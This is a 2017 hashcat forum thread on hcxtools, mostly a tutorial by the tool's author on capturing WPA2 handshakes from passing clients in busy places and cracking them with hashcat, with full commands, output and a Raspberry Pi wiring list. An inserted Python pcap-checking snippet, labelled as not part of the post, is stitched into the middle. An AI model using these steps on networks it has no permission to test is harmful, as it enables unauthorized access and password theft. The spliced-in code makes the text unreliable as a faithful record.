07-22-2017, 06:33 AM
07-22-2017, 09:36 AM
Hi.
This is only the first fatal error you got. There will be much more...
You will have to find a replacement for linux iwlib.
The Apple Developer Connection website has a lot of articles which talk about porting progs between environments. You'll need to read these first (and similar articles on the Internet) to get a better sense of the issues involved.
"Certainly, it can be done. In fact, it is fairly routine." But it's really too much for a forum-post here.
And from the hcxtools README:
Requirements: Linux
That's because I'm a very, very lazy coder. That means if there is a library which is able to do the job better than my tools, I'll use this lib.
Maybe a solution:
edit the Makefile
and remove all entries for wlandump-ng and wlanresponse (these are extremely hardware-near coded)
then try to compile hcxtools
maybe that works for you
use a raspberry pi A+, B+ to capture
do not use a raspberry pi 3 (wifi soc doesn't work - no monitor mode)
do not use wlandump-ng or wlanresponse on virtual devices like monx (mon0,...)
07-22-2017, 10:07 AM
basic tutorial about the features to capture passwords from WLAN traffic
1.
Choose a place where you do expect to receive many, many clients.
run wlandump-ng or wlanresponse for a while (one or more hours) using these options:
on a notebook
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20
on a raspberry
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 128 -b -r -l -L -s 0
wlanresponse -i <mywlandevice> -o test.cap -t 3 -b -l -L
<mywlandevice> is your WLAN device (it must already be running in monitor mode on a real device - do not use virtual devices like mon0).
Please download and use the attached test.cap for this tutorial [attachment=512]
Extract and copy the cap to a folder and open a terminal inside.
2.
Let's check the cap:
$ wlancapinfo -i test.cap
input file.......: test.cap
magic file number: 0xa1b2c3d4 (cap/pcap)
major version....: 2
minor version....: 4
data link type...: 105 (DLT_IEEE802_11) [https://www.tcpdump.org/linktypes.html]
packets inside...: 6
last pcap error..: flawless
The cap looks like a normal cap, but you should convert it only by using wlancap2hcx, because there is information inside that other tools are not able to strip.
Let's convert the cap:
$ wlancap2hcx -o test.hccapx -e wordlist test.cap
start reading from test.cap
6 packets processed (6 wlan, 0 lan, 0 loopback)
found 1 wpa2 AES Cipher, HMAC-SHA1
found 1 valid wpa handshake (by wlandump-ng/wlanresponse)
You can see that there's a valid WPA2 handshake inside and that
wlandump-ng/wlanresponse initiates the authentication with the client.
No access point captured - there is no need to capture an access point to get the data!
We use the -e option to save network names and passwords to a file (it's a good idea to use this option every time you run wlancap2hcx).
$ ls
test.hccapx test.cap wordlist
now sort our wordlist
$ sort wordlist | uniq > wordlistsort
you need to do this, because there are many dupes inside.
$ ls
test.hccapx test.cap wordlist wordlistsort
now run hashcat
$ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsort
hashcat (v3.6.0-247-g8f2cbb26) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
Time.Started.....: Sat Jul 22 09:59:12 2017 (0 secs)
Time.Estimated...: Sat Jul 22 09:59:12 2017 (0 secs)
Guess.Base.......: File (wordlistsort)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 0 H/s (0.36ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2/2 (100.00%)
Rejected.........: 0/2 (0.00%)
Restore.Point....: 0/2 (0.00%)
Candidates.#1....: AXNDFNEU -> UPC501953949
HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8
Take a look into the potfile and you can imagine what's going on.
You cracked the hash, using the captured password from WLAN traffic.
It's a good idea to add/copy/cat the wordlist to your wordlist(s) - every time you run wlancap2hcx on new cap files.
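A check of the pcap container along the lines of the wlancapinfo step above, as an added example that is not part of the post or of hcxtools: it parses the global header, names the link type, counts records and stops at a truncated record, reporting the same fields (magic, version, DLT, packet count, last error). The sample cap is constructed inline; the function names are assumptions.

```python
import struct

# Link-layer types (subset of https://www.tcpdump.org/linktypes.html)
LINKTYPES = {1: "DLT_EN10MB", 105: "DLT_IEEE802_11", 127: "DLT_IEEE802_11_RADIO"}

# pcap magic bytes as they appear on disk -> (struct byte order, timestamp unit)
MAGICS = {
    b"\xd4\xc3\xb2\xa1": ("<", "us"),   # 0xa1b2c3d4 written little-endian
    b"\xa1\xb2\xc3\xd4": (">", "us"),   # 0xa1b2c3d4 written big-endian
    b"\x4d\x3c\xb2\xa1": ("<", "ns"),   # 0xa1b23c4d, nanosecond timestamps
    b"\xa1\xb2\x3c\x4d": (">", "ns"),
}

def capinfo(data: bytes) -> dict:
    """Parse the 24-byte pcap global header, then walk every packet record."""
    if len(data) < 24:
        raise ValueError("shorter than a pcap global header")
    magic = data[:4]
    if magic not in MAGICS:
        raise ValueError("not a cap/pcap file (magic bytes %s)" % magic.hex())
    order, ts_unit = MAGICS[magic]
    major, minor, _tz, _sig, snaplen, linktype = struct.unpack(order + "HHiIII", data[4:24])
    packets, off, error = 0, 24, "flawless"
    while off < len(data):
        if off + 16 > len(data):                     # record header cut off
            error = "truncated record header at offset %d" % off
            break
        _ts, _frac, incl_len, orig_len = struct.unpack(order + "IIII", data[off:off + 16])
        if incl_len > orig_len or off + 16 + incl_len > len(data):
            error = "truncated or corrupt record %d at offset %d" % (packets + 1, off)
            break
        packets += 1
        off += 16 + incl_len
    return {
        "magic": "0x%08x" % struct.unpack(order + "I", magic)[0],
        "major": major, "minor": minor, "snaplen": snaplen, "ts_unit": ts_unit,
        "linktype": linktype, "linkname": LINKTYPES.get(linktype, "unknown"),
        "packets": packets, "error": error,
    }

def build_sample_cap(n_packets: int, truncate: int = 0) -> bytes:
    """Constructed sample: little-endian pcap, DLT 105, n placeholder records."""
    hdr = struct.pack("<IHHiIII", 0xa1b2c3d4, 2, 4, 0, 0, 65535, 105)
    body = b""
    for i in range(n_packets):
        frame = b"\x88\x02" + b"\x00" * 22           # 24 filler bytes, not a real frame
        body += struct.pack("<IIII", 1500000000 + i, 0, len(frame), len(frame)) + frame
    cap = hdr + body
    return cap[:-truncate] if truncate else cap      # optionally chop the tail
```

Run capinfo() on a real capture's bytes to confirm the container is intact before converting it; an error other than "flawless" means the capture was cut short and the last handshake may be incomplete.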
07-22-2017, 03:01 PM
(07-22-2017, 09:36 AM) ZerBea Wrote: Hi.
This is only the first fatal error you got. There will be much more...
You will have to find a replacement for linux iwlib.
The Apple Developer Connection website has a lot of articles which talk about porting progs between environments. You'll need to read these first (and similar articles on the Internet) to get a better sense of the issues involved.
"Certainly, it can be done. In fact, it is fairly routine." But it's really too much for a forum-post here.
And from the hcxtools README:
Requirements: Linux
That's because I'm a very, very lazy coder. That means if there is a library which is able to do the job better than my tools, I'll use this lib.
Maybe a solution:
edit the Makefile
and remove all entries for wlandump-ng and wlanresponse (these are extremely hardware-near coded)
then try to compile hcxtools
maybe that works for you
use a raspberry pi A+, B+ to capture
do not use a raspberry pi 3 (wifi soc doesn't work - no monitor mode)
do not use wlandump-ng or wlanresponse on virtual devices like monx (mon0,...)
Ok, I will have a try. Thanks anyway.
07-22-2017, 08:03 PM
Well, let's see how it works.
How about hcxkeys. Are you able to compile them?
07-23-2017, 02:36 PM
(07-22-2017, 06:33 AM) QYQ Wrote: I have a problem when make install, there is no <linux/wireless.h> file
my sys is mac os sierra 10.12.6
how can I find the losing file
thanks.
Run an Ubuntu VM in VMware Fusion. Works very well.
You will need to use a supported USB WiFi adapter but you would want to do that anyway.
08-03-2017, 08:38 AM
Read more about the authentication process and the importance of the message M2 here:
https://hashcat.net/forum/thread-6745-po...l#pid36007
08-04-2017, 07:24 PM
Can you post up a clear GPIO pin out and what is needed for the Hardware mod. I would assume a switch and a couple LED's. but a pinout explanation would be nice.
Thanks,
Winxp
08-04-2017, 08:07 PM
Circuit:
https://github.com/ZerBea/hcxtools/blob/...iowait.odg
Parts:
1 x LED, Low-Current (Kingbright 2.2 V, 2 mA)
1 x Resistor 10k Ohms
1 x Resistor 330 Ohms
1 Push Button
20cm cable
GPIO pin pin GPIO
-------------------------------------
3V3 1 5V
1/3 (SCL) 6 0V
4 7 14 (TXD)
17 (ce1) 11 18 (ce0)
Basic tutorial on how to "wiringpi"
https://www.sunfounder.com/forum/how-to-...ry-pi/?p=1
08-04-2017, 10:02 PM
Thanks, much obliged.